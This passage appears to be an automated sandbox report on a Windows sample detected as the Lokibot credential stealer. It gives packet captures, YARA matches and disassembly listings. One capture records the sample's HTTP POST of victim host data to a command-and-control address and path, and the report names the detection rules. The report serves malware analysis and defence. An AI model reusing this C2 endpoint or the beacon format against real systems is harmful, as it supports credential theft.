{background-colo
Mar 28, 2024 20:56:56.141978025 CET	1286	IN	Data Raw: 72 3a 20 23 37 66 62 66 34 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 6e 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 39 Data Ascii: r: #7fbf4d!important;}#dclm_modal_content nav .av_no {background-color: #999999!important;}#dclm-logo img {opacity: 0.5;}</style>... Rank Math - https://rankmath.com/ --><title>Page Not Found -
Mar 28, 2024 20:56:56.141990900 CET	1286	IN	Data Raw: 68 65 6d 61 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 41 64 75 6c 74 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 2c 22 40 69 Data Ascii: hema">{"@context":"https://schema.org","@graph":[{"@type":"AdultEntertainment","@id":"https://www.yaworld.net/#organization","name":"\uc57c\ub3d9\uc6d4\ub4dc","url":"https://www.yaworld.net","logo":{"@type":"ImageObject","@id":"https://www.yaw
Mar 28, 2024 20:56:56.142004967 CET	1286	IN	Data Raw: 26 72 61 71 75 6f 3b 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 77 6f 72 6c 64 2e 6e 65 74 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 Data Ascii: » " href="https://www.yaworld.net/feed/" /><link rel="alternate" type="application/rss+xml" title=" » " href="https://www.yaworld.net/comments/feed/" /><script type="text/javascript">/* <![CDATA[ *
Mar 28, 2024 20:56:56.142018080 CET	1286	IN	Data Raw: 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 Data Ascii: ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83e\ude
Mar 28, 2024 20:56:56.142065048 CET	1286	IN	Data Raw: 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 Data Ascii: defined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectU
Mar 28, 2024 20:56:56.142077923 CET	541	IN	Data Raw: 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d Data Ascii: ne !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.yaworld.net/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3' type='text/css' media='all' /><style id='rank-math-t
Mar 28, 2024 20:56:56.142090082 CET	1286	IN	Data Raw: 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e Data Ascii: s-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.1
Mar 28, 2024 20:56:56.142102957 CET	1286	IN	Data Raw: 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a Data Ascii: gba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238
Mar 28, 2024 20:56:56.272609949 CET	1286	IN	Data Raw: 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d Data Ascii: rge: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	31.220.1.194	80	7628	C:\Users\user\Desktop\XZoxEqlRUw.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 20:56:57.374972105 CET	246	OUT	POST /~zadmin/ptr5/mono.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 31.220.1.194 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E0B63912 Content-Length: 149 Connection: close
Mar 28, 2024 20:56:57.559639931 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
Mar 28, 2024 20:56:58.431116104 CET	1286	IN	HTTP/1.1 404 Not Found Date: Thu, 28 Mar 2024 19:56:57 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 67 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: <!DOCTYPE html><html lang="ko-KR" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11">... Meta social networks -->... Google Analytics -->... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-5F1HBKQ0XE"></script><script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-5F1HBKQ0XE');</script>... Meta Verification --><meta name="google-site-verification" content="Gr7QG6k4WBHg3_FdErdBSqvByz_LWD7lT9GvHtfy9Iw" /><style>#dclm_modal_screen {background-color: rgba(0,0,0,0.8);}#dclm_modal_content {background-color: #000;}#dclm_modal_content h2 {color: #ccc;}#dclm_modal_content p {color: #999;}#dclm_modal_content nav .av_go {background-colo
Mar 28, 2024 20:56:58.431134939 CET	1286	IN	Data Raw: 72 3a 20 23 37 66 62 66 34 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 6e 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 39 Data Ascii: r: #7fbf4d!important;}#dclm_modal_content nav .av_no {background-color: #999999!important;}#dclm-logo img {opacity: 0.5;}</style>... Rank Math - https://rankmath.com/ --><title>Page Not Found -
Mar 28, 2024 20:56:58.431143045 CET	1286	IN	Data Raw: 68 65 6d 61 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 41 64 75 6c 74 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 2c 22 40 69 Data Ascii: hema">{"@context":"https://schema.org","@graph":[{"@type":"AdultEntertainment","@id":"https://www.yaworld.net/#organization","name":"\uc57c\ub3d9\uc6d4\ub4dc","url":"https://www.yaworld.net","logo":{"@type":"ImageObject","@id":"https://www.yaw
Mar 28, 2024 20:56:58.431149006 CET	1286	IN	Data Raw: 26 72 61 71 75 6f 3b 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 77 6f 72 6c 64 2e 6e 65 74 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 Data Ascii: » " href="https://www.yaworld.net/feed/" /><link rel="alternate" type="application/rss+xml" title=" » " href="https://www.yaworld.net/comments/feed/" /><script type="text/javascript">/* <![CDATA[ *
Mar 28, 2024 20:56:58.431157112 CET	1286	IN	Data Raw: 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 Data Ascii: ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83e\ude
Mar 28, 2024 20:56:58.431164980 CET	1286	IN	Data Raw: 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 Data Ascii: defined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectU
Mar 28, 2024 20:56:58.431179047 CET	541	IN	Data Raw: 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d Data Ascii: ne !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.yaworld.net/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3' type='text/css' media='all' /><style id='rank-math-t
Mar 28, 2024 20:56:58.431231022 CET	1286	IN	Data Raw: 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e Data Ascii: s-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.1
Mar 28, 2024 20:56:58.431242943 CET	1286	IN	Data Raw: 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a Data Ascii: gba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238
Mar 28, 2024 20:56:58.539453030 CET	1286	IN	Data Raw: 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d Data Ascii: rge: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80:

Target ID:	0
Start time:	20:56:49
Start date:	28/03/2024
Path:	C:\Users\user\Desktop\XZoxEqlRUw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\XZoxEqlRUw.exe"
Imagebase:	0x400000
File size:	241'664 bytes
MD5 hash:	06E4CE3AA8AE08067B686BA000255529
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:56:50
Start date:	28/03/2024
Path:	C:\Users\user\Desktop\XZoxEqlRUw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\XZoxEqlRUw.exe"
Imagebase:	0x400000
File size:	241'664 bytes
MD5 hash:	06E4CE3AA8AE08067B686BA000255529
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	13.6%
Signature Coverage:	9.1%
Total number of Nodes:	22
Total number of Limit Nodes:	6

Executed Functions

Function 00401188 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 541
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040118D

Strings

VB5!6&*, xrefs: 00401188

Memory Dump Source

Source File: 00000000.00000002.1615378351.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1615366821.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615400772.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615411943.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615424535.0000000000438000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_XZoxEqlRUw.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 43191d290e2fe5b36c2f6f6801ed8530430a7445a19b24f0947819cd1d020c22
Instruction ID: f449f421e92e95750a659053d5263ea0c51953928242989adc6c5edc30345cfa
Opcode Fuzzy Hash: 43191d290e2fe5b36c2f6f6801ed8530430a7445a19b24f0947819cd1d020c22
Instruction Fuzzy Hash: 1602E03240E3D14FDB139B748A661967FB1AE1331471D04EBC881EF2F3D229691AD76A

Uniqueness

Uniqueness Score: -1.00%

Function 00434ED4 Relevance: 12.1, APIs: 8, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaAryConstruct2.MSVBVM60(?,00434B3C,00000003), ref: 00434F27
__vbaNew2.MSVBVM60(00434B18,004367C0,?,00434B3C,00000003), ref: 00434F3E
__vbaHresultCheckObj.MSVBVM60(00000000,0217E8DC,00434B08,0000004C), ref: 00434F62
__vbaHresultCheckObj.MSVBVM60(00000000,?,00434B28,00000028), ref: 00434F81
__vbaFreeObj.MSVBVM60(00000000,?,00434B28,00000028), ref: 00434F89
__vbaNew2.MSVBVM60(00431C5C,00436010), ref: 00434FA0
__vbaHresultCheckObj.MSVBVM60(00000000,004B0AA0,004329E4,000001BC), ref: 00434FC7
__vbaAryDestruct.MSVBVM60(00000000,?,00434FFA), ref: 00434FF4

Memory Dump Source

Source File: 00000000.00000002.1615378351.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1615366821.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615400772.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615411943.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615424535.0000000000438000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_XZoxEqlRUw.jbxd

Similarity

API ID: __vba$CheckHresult$New2$Construct2DestructFree
String ID:
API String ID: 991968928-0
Opcode ID: 0e5078d248e38e2ceb3f44712682d89e77e2d4208bdc89b9c80f2d8b68b54a29
Instruction ID: a594a39ab6be6e9a62541bb5d98a3b2aeace1bbcb8975ddcc673329222850864
Opcode Fuzzy Hash: 0e5078d248e38e2ceb3f44712682d89e77e2d4208bdc89b9c80f2d8b68b54a29
Instruction Fuzzy Hash: 65316270A40204FBCB10EF55CC86FDABBB8EF4C714F15516AF105B72A1C77969048B98

Uniqueness

Uniqueness Score: -1.00%

Function 00435017 Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,00432A14,000006F8), ref: 00435047
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00435059

Memory Dump Source

Source File: 00000000.00000002.1615378351.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1615366821.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615400772.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615411943.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615424535.0000000000438000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_XZoxEqlRUw.jbxd

Similarity

API ID: __vba$CheckErrorHresultSystem
String ID:
API String ID: 2264031751-0
Opcode ID: a473925b85657edbf4ae0aed13c37bf3b13bf1b2b259b3e1a2054fed6c888e50
Instruction ID: 010cf1016f4392d8a1fa08713d32d299b8d7de1e2abf42134fdf61e0d525520b
Opcode Fuzzy Hash: a473925b85657edbf4ae0aed13c37bf3b13bf1b2b259b3e1a2054fed6c888e50
Instruction Fuzzy Hash: F0E0A770681205BBEB14EB91DC06F9E77A89F45718F10006AF101B7081D6B96A00869C

Uniqueness

Uniqueness Score: -1.00%

Function 00434AC8 Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1615378351.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1615366821.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615400772.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615411943.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1615424535.0000000000438000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_XZoxEqlRUw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee7edb3d72074718e6c01df245425803cc98867f0e08182597286b5bf4b83e09
Instruction ID: 1a4bc2478ee898971e6bbae363d6179823a5a2f3d603fc4ecd58c4f44d953479
Opcode Fuzzy Hash: ee7edb3d72074718e6c01df245425803cc98867f0e08182597286b5bf4b83e09
Instruction Fuzzy Hash: 74B012203CC102AB530066545C128A311C0D28D7C0720EC33F201C63D0CB58EC00437D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: XZoxEqlRUw.exePID: 7628, Parent PID: 7604COMMON

Execution Graph

Execution Coverage:	31.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

